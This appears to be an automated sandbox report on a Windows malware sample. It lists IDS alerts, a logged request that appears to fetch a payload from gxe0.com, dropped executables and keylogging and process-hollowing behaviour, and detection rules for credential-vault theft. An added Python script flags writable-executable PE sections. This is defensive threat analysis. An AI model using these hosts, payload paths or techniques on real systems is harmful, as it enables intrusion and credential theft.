                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49721
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49888
                      Source: global trafficTCP traffic: 192.168.2.6:49714 -> 51.195.88.199:587
Source: global traffic | HTTP traffic detected:
    GET /yak/233_Wisrysxlfss HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: gxe0.com
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: gxe0.com
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: s82.gocheapweb.com
Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49781 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: neworigin.exe.8.dr, cPKWk.cs | .Net Code: I3Mi2zn6x
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary

Source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: server_BTC.exe.8.dr, opqcmgIPmeabY.cs | Long String: Length: 17605
Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.cs | Long String: Length: 17605
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED8670 NtUnmapViewOfSection
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED8400 NtReadVirtualMemory
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED7A2C NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDDC8C RtlDosPathNameToNtPathName_U, NtCreateFile, NtWriteFile, NtClose
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDDC04 RtlI, RtlDosPathNameToNtPathName_U, NtDeleteFile
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED7D78 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED8D70 GetThreadContext, Wow64GetThreadContext, SetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDDD70 RtlDosPathNameToNtPathName_U, NtOpenFile, NtQueryInformationFile, NtReadFile, NtClose
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED7A2A NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDDBB0 RtlI, RtlDosPathNameToNtPathName_U, NtDeleteFile
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED8D6E GetThreadContext, Wow64GetThreadContext, SetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB8670 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB8400 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB7A2C NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB7D78 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB8D70 Wow64GetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CBDD70 NtOpenFile, NtReadFile, NtClose
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB86F7 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB7AC9 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB7A2A NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 22_2_02CB8D6E Wow64GetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D88670 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D88400 NtReadVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D87A2C NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D87D78 NtWriteVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D88D70 GetThreadContext, Wow64GetThreadContext, SetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D8DD70 RtlDosPathNameToNtPathName_U, NtOpenFile, NtReadFile, NtClose
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D886F7 NtUnmapViewOfSection
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D87AC9 NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D87A2A NtAllocateVirtualMemory
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D8DBB0 RtlInitUnicodeString, RtlDosPathNameToNtPathName_U, NtDeleteFile
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D8DC8C RtlDosPathNameToNtPathName_U, NtWriteFile, NtClose
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D8DC04 RtlInitUnicodeString, RtlDosPathNameToNtPathName_U, NtDeleteFile
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: 27_2_02D88D6E GetThreadContext, Wow64GetThreadContext, SetThreadContext, Wow64SetThreadContext, NtResumeThread
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDF7C8 InetIsOffline, CoInitialize, CoUninitialize, CreateProcessAsUserW, ResumeThread, CloseHandle, CloseHandle, ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_013B85B710_2_013B85B7
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 10_2_013B85C810_2_013B85C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_040EB49011_2_040EB490
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_0549DAAC16_2_0549DAAC
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_054925A816_2_054925A8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_054925B816_2_054925B8
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_0549E62016_2_0549E620
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_05491D2016_2_05491D20
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 16_2_05EA336016_2_05EA3360
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02CA20C422_2_02CA20C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D74A9825_2_00D74A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7EA8025_2_00D7EA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D73E8025_2_00D73E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7DE3825_2_00D7DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D741C825_2_00D741C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7DE3825_2_00D7DE38
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_00D7A98825_2_00D7A988
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B66E825_2_066B66E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B56B825_2_066B56B8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BC2A025_2_066BC2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BB32B25_2_066BB32B
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B317825_2_066B3178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B7E7825_2_066B7E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B779825_2_066B7798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066BE4C025_2_066BE4C0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B235025_2_066B2350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B004025_2_066B0040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B5DDF25_2_066B5DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B003825_2_066B0038
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 25_2_066B000625_2_066B0006
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 27_2_02D720C427_2_02D720C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A41C829_2_030A41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030AAA4329_2_030AAA43
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030AEA8029_2_030AEA80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A4A9829_2_030A4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_030A3E8029_2_030A3E80
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F066E829_2_06F066E8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0C2A029_2_06F0C2A0
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F07E7829_2_06F07E78
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0B33529_2_06F0B335
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F058B529_2_06F058B5
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0317829_2_06F03178
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0779829_2_06F07798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0235029_2_06F02350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0004029_2_06F00040
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F05DDF29_2_06F05DDF
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 29_2_06F0000629_2_06F00006
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Wisrysxl.PIF F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02D8894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02CA4860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02CA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02D746D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02D74860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Code function: String function: 02CB894C appears 50 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02ED89D0 appears 45 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02EC46D4 appears 244 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02ED894C appears 56 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02EC44DC appears 74 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02EC4500 appears 33 times
Source: C:\Users\user\Desktop\x.exe | Code function: String function: 02EC4860 appears 949 times
Source: x.exe | Binary or memory string: OriginalFilename vs x.exe
Source: x.exe, 00000000.00000002.2243776904.0000000021E70000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs x.exe
Source: x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000002.2233962338.0000000020C24000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs x.exe
Source: x.exe, 00000000.00000003.2170510348.0000000021EB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000002.2244527855.000000002206F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000003.2180899022.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2200179187.0000000002E46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs x.exe
Source: x.exe, 00000000.00000003.2111145235.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2111145235.0000000002C11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000002.2200179187.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000002.2233962338.0000000020C79000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs x.exe
Source: x.exe, 00000000.00000002.2262163417.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs x.exe
Source: x.exe, 00000000.00000003.2170510348.0000000021EE3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs x.exe
Source: x.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 9.0.neworigin.exe.840000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: armsvc.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
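The two "Static PE information" entries above are raw flag dumps: the COFF file-header Characteristics of x.exe, and the section-header Characteristics of the .reloc section in the dropped armsvc.exe. A linker writes .reloc as IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ; a .reloc that is also IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE was given those rights after linking, which is what a file infector needs when it appends its own code to the last section of a host binary. The following is an added example, not Joe Sandbox tooling and not code from any file in this report: a standard-library-only parser that decodes both flag sets and lists every section mapped writable and executable. The PE that build_sample_pe() returns is constructed here to carry exactly the flags the report lists; it is a header-only stand-in for armsvc.exe, not the dropped file itself.

```python
import struct
from typing import Dict, List

# COFF file-header Characteristics bits, named as the report names them (IMAGE_FILE_ prefix dropped).
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
    0x8000: "BYTES_REVERSED_HI",
}
# Section-header Characteristics bits.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FLAGS = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_DISCARDABLE: "IMAGE_SCN_MEM_DISCARDABLE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> Dict:
    """DOS header -> PE signature -> COFF header -> section table. The optional header is skipped by size."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        name, _, va, _, _, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "flags": flags, "flag_names": decode_flags(flags, SECTION_FLAGS)})
    return {"machine": machine, "characteristics": decode_flags(characteristics, FILE_CHARACTERISTICS),
            "sections": sections}


def writable_executable_sections(pe: Dict) -> List[str]:
    """Names of sections mapped W+X; a linker never emits .reloc this way."""
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in pe["sections"] if s["flags"] & wx == wx]


def build_sample_pe() -> bytes:
    """Constructed header-only PE32: a normal .text plus a .reloc carrying the flags the report
    lists for armsvc.exe. It contains no code and is not loadable; it only exercises the parser."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    optional = b"\x0b\x01" + b"\0" * 222  # PE32 magic 0x10B, remaining 222 bytes zeroed (224 total)
    coff = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, len(optional),
                       0x0002 | 0x0004 | 0x0008 | 0x0080 | 0x0100 | 0x8000)  # the x.exe flag set

    def section(name: bytes, va: int, flags: int) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, 0x1000, va, 0, 0, 0, 0, 0, 0, flags)

    text = section(b".text", 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    reloc = section(b".reloc", 0x2000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE
                    | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    return bytes(dos) + b"PE\0\0" + coff + optional + text + reloc


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    pe = parse_pe(blob)
    print("file characteristics:", ", ".join(pe["characteristics"]))
    for s in pe["sections"]:
        print(f"  {s['name']:<8} {', '.join(s['flag_names'])}")
    print("W+X sections:", writable_executable_sections(pe) or "none")
```

Run it with a file path to audit a dropped binary, or with no argument to see the constructed sample flag .reloc. The check is deliberately narrow: W+X on any section is worth a look, but W+X on .reloc or on the last section of a signed vendor binary is the pattern to escalate.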
Source: neworigin.exe.8.dr, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.8.dr, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.8.dr, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.8.dr, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
Source: neworigin.exe.8.dr, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.8.dr, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: neworigin.exe.8.dr, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.8.dr, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@47/24@4/3
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC7FD4 GetDiskFreeSpaceA
Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED6DC8 CoCreateInstance
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:828:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-659475502e6d002ef280244-b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-659475502e6d002-inf
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File created: C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\Desktop\x.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\x.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
